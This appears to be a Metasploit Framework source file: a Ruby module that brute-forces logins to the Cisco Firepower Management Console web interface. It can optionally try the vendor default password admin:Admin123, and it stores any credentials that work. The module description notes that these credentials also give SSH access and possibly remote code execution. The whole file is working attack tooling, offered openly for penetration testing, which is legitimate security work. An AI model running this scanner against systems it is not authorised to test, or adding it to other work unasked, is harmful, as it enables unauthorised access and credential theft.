rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/cisco_firepower'
require 'metasploit/framework/credential_collection'
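# Auxiliary login scanner for the Cisco Firepower Management console web UI.
#
# Credentials come from the USERNAME/PASSWORD datastore options (plus, when
# TRYDEFAULT is set, the vendor default admin:Admin123). Every attempt is
# handed to Metasploit::Framework::LoginScanner::CiscoFirepower and the outcome
# is written to the workspace, so a finding of the default or a weak password
# is recorded together with the service it was seen on.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers module metadata and the module-specific options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Firepower Management Console 6.0 Login',
        'Description' => %q{
          This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.
          The credentials are also used for SSH, which could allow remote code execution.
        },
        'Author' => [ 'sinn3r' ],
        'License' => MSF_LICENSE,
        # The console is reached over TLS on 443 unless the operator overrides it.
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'SSLVersion' => 'Auto'
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:Admin123', false])
      ]
    )
  end

  # Builds the login scanner for this run, creating it on first use.
  #
  # The result is memoized in @scanner, so the ip of the first call is the one
  # the scanner is bound to.
  # NOTE(review): presumably each host is processed by its own module instance,
  # which is what makes the memoization safe - confirm against the Scanner mixin.
  #
  # @param ip [String] address of the host to test
  # @return [Metasploit::Framework::LoginScanner::CiscoFirepower]
  def scanner(ip)
    @scanner ||= begin
      cred_collection = build_credential_collection(
        username: datastore['USERNAME'],
        password: datastore['PASSWORD']
      )

      # Optional check for an appliance that still has the vendor default password.
      if datastore['TRYDEFAULT']
        print_status("Default credential admin:Admin123 added to the credential queue for testing.")
        cred_collection.add_public('admin')
        cred_collection.add_private('Admin123')
      end

      Metasploit::Framework::LoginScanner::CiscoFirepower.new(
        configure_http_login_scanner(
          host: ip,
          port: datastore['RPORT'],
          cred_details: cred_collection,
          stop_on_success: datastore['STOP_ON_SUCCESS'],
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
          connection_timeout: 5, # fixed value; not exposed as a datastore option here
          http_username: datastore['HttpUsername'],
          http_password: datastore['HttpPassword'],
          uri: target_uri.path
        )
      )
    end
  end

  # Records a working credential and the login it produced in the workspace.
  #
  # @param ip [String] address the credential was accepted on
  # @param port [Integer] port the credential was accepted on
  # @param result [Object] scanner result exposing credential, status and proof
  # @return [Object] whatever create_credential_login returns
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      # Label the service by the transport actually in use. The module defaults
      # to SSL on 443, so a fixed 'http' would mislabel the finding for anyone
      # triaging the workspace afterwards.
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Marks a credential as not working for this service.
  #
  # @param ip [String] address the attempt was made against
  # @param rport [Integer] port the attempt was made against
  # @param result [Object] scanner result exposing credential, status and proof
  # @return [Object] whatever invalidate_login returns
  def report_bad_cred(ip, rport, result)
    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: result.credential.public,
      private: result.credential.private,
      realm_key: result.credential.realm_key,
      realm_value: result.credential.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs every queued credential against the host and reports each outcome.
  #
  # @param ip [String] address of the host to test
  def bruteforce(ip)
    scanner(ip).scan! do |result|
      case result.status
      when Metasploit::Model::Login::Status::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
        report_good_cred(ip, rport, result)
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when Metasploit::Model::Login::Status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
        report_bad_cred(ip, rport, result)
      else
        # Any other status used to be dropped without a trace; show it in
        # verbose output so an unexpected scanner outcome is visible in the log.
        vprint_brute(level: :verror, ip: ip, msg: "Unhandled status '#{result.status}' for '#{result.credential}'")
      end
    end
  end

  # Per-host entry point: confirms the target looks like a Firepower
  # Management console before any credential is tried.
  #
  # @param ip [String] address of the host to test
  def run_host(ip)
    unless scanner(ip).check_setup
      print_brute(level: :error, ip: ip, msg: 'Target is not Cisco Firepower Management console.')
      return
    end

    bruteforce(ip)
  end
end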